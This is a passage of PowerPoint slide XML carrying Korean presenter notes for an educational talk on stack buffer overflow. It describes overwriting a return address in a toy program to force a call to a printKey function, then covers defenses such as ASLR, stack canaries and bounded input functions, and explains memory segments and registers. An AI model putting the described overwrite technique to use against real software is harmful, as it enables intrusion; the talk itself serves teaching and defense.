              <a:t> 그것은 관점의 차이 때문에 일어나는 데요 자세한 것은 보고서를 참고 부탁드립니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>예를들어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>12345678</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이라는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>진수 데이터를 저장할 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>big endian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>12345678</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그대로 저장하며 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Little endian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>78563412</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 순서로 저장합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>운영체제는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Little endian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>방식을 적용하고 있습니다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return address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>printKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수에 주소값을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가 알아듣게 저장하기 위해선 이 방식에 따라 저장해야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62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따라서 다음과 같은 문자열이 더 적절하다고 할 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>하지만 한가지 문제가 더 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>우리가 입력하는 것이 문자열이라는 문제입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>return addres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>진수의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>숫자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가 들어가야 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>하지만 문자열을 입력받고 있는데 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이라는 값을 입력한다고 치면 컴퓨터는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>‘8’,’0’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 각각의 문자로 입력받게 됩니다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80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이라는 숫자를 입력해 주려면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 해당하는 아스키 코드 문자를 입력해 주어야 할 것 입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>마찬가지고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>\x8b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>라는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>진수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>\x8b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그대로 입력해 버리면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>‘\’, ‘x’, ‘8’, ‘b’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 각각의 문자로 입력받게 되므로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>\x8b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 해당하는 문자를 입력해 넣어줘야 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이는 다양한 방법이 있을 수 있겠습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>저는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>코드를 이용해 입력했습니다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47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 과 같이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>명령어를 이용해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>번 그리고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>printKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 주소를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>byte order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 맞게 입력해줄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8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공격 결과입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>강제로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>printKey </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 호출해 키 값을 얻은 것을 볼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2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대처 방안입니다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84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Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>환경은 실제로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격을 막기 위해 다양한 기능이 적용돼 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그중 강력한 몇가지를 설명해 드리겠습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>ASLR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>은 메모리상의 주소를 실행시마다 랜덤으로 바꿔버리는 기능입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>스택상의 주소가 실행 시마다 바뀌게 되면 실행하고자 하는 코드의 위치도 매번 바뀌고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>return adress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 위치도 매번 바뀌기 때문에 강력한 방어</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>기법이라고 할 수있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>하지만 프로그램의 성능이 다소 감소할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Stack Canary: Canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 밀고자라는 뜻인데요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 호출 할 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>return address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>와 함수의 버퍼 사이에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>라는 특정한 값을 넣어줍니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수가 종료될 때 이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>값의 원본값과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>값을 비교하여 다르다면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격을 받았다 판단하고 프로그램을 강제로 종료해 버립니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이것도 상당히 강력한 기법이라고 할 수 있씁니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>리눅스 뿐만 아니라 윈도우 등의 규모가 큰 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에는 이와 비슷한 방어 기능이 적용돼 있는 것으로 알고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4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실제로 리눅스 환경에서 실행되는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>언어 프로그램에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격을 하기란 쉽지 않습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>하지만 모든 운영체제가 이와 같은 기능을 가지고 있는 것은 아니고 그럴 수도 없겠죠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>한편 최근 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>IOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>열풍이 불면서 임베디드 시스템이 쏟아져 나오고 있는데</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 임베디드 시스템은 그것이 동작하는 환경이 리눅스보다 훨씬 규모도 작고 성능도 낮습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>따라서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>언어를 이용해 시스템을 구성합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>하지만 같은 이유로 시스템 차원에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격을 막는 기법을 적용하기 어렵고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격에 대바하지 않은 임베디드 시스템이 등장하고 있는 추세입니다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우리는 코드 작성시에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격을 능동적으로 막을 수 있는 방법을 알 필요가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만약 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>visual studio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>언어 코딩을 한다면 간단합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. visual studio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에서 제공해주는 대체 함수가 있기 때문입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그 함수는 다음과 같다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 그림과 같이 접미사로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 붙인 후 입력받을 데이터의 크기를 인자로 넘기면 됩니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>물론 컴파일러에 상관없이 프로그래머가 대응할 수 있는 방법도 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>예시를 통해 알아보겠습니다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get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>대신 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>fgets, scanf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 포멧스트링을 수정하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, strcpy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>대신 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>strncpy, strcat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>대신 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>strncat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이와 같이 입력받을 크기를 지정하여 메모리 침범이 일어나지 않도록 하는 방식으로 대응을 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이론적 배경의 목차입니다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61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참고문헌입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>지금까지 발표를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>들어주셔서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 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0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메모리는 다음과 같이 구성되어 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>커널은 맨 하위 주소에 위치해 있고 그 중간은 빈 공간입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>커널에는 운영체제가 필요로 하는 기본적인 명령어가 들어가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프로세스란 컴퓨터에서 실행되고있는 프로그램을 뜻합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>시스템은 프로세스를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>라는 단위로 묶습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그리고 가용 공간에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>적재시킵니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>물론 하나의 메모리에 여러 세그먼트가 들어갈 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이것은 한번에 여러 프로그램을 실행시킬 수 있다는 의미입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>세그먼트는 다음과 같이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Code, Data, Stack segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>으로 이루어져 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이 외에도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>TEXT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segment, Heap segment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등이 있지만 이번 발표에는 다루지 않겠습니다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Code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영역에는 컴파일러가 만든 코드의 기계어가 들어가 있습니다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010101101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처럼요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영역에는 프로그램이 </a:t>
            </a:r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실행시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사용되는 데이터가 들어갑니다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정적변수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전역변수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문자열상수 등등이 들어갑니다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영역에는 함수의 지역변수와 매개변수가 들어가는 곳이며 스택 포인터라는 레지스터에 의해 정보가 저장되고 읽히는 과정이 일어납니다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그럼 레지스터가 </a:t>
            </a:r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뭔지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알아보겠습니다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5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레지스터는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 빠른 연산을 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>내부에 존재하는 메모리입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. 32bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>운영체제에서 레지스터의 크기는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>32bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>즉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>바이트 입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>레지스터의 종류는 크게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가지로 분류되고 그 안에 또 레지스터들이 잔뜩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이번 발표에서는 시간관계상 반드시 알아야 할 레지스터만 소개하도록 하겠습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>만약 더 알고 싶은 분이 있으시다면 제 보고서를 참고하시면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2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범용 레지스터는 프로그래머가 임의로 조작할 수 있게 허용되어 있는 레지스터 입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그중 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가지만 보겠습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>ESP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 스택의 맨 꼭대기 주소 값이 저장되는 곳입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. ESP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 더하거나 빼서 스택 상에 정보를 저장하거나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 빼거나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 가져올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EAX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 더하기 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>뻬기등의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 연산을 처리할 때 임시로 중간값을 저장해 놓는 곳입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>EBP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 스택 프레임의 시작 주소가 저장되는 곳인데</a:t>
            </a:r>
            <a:r>
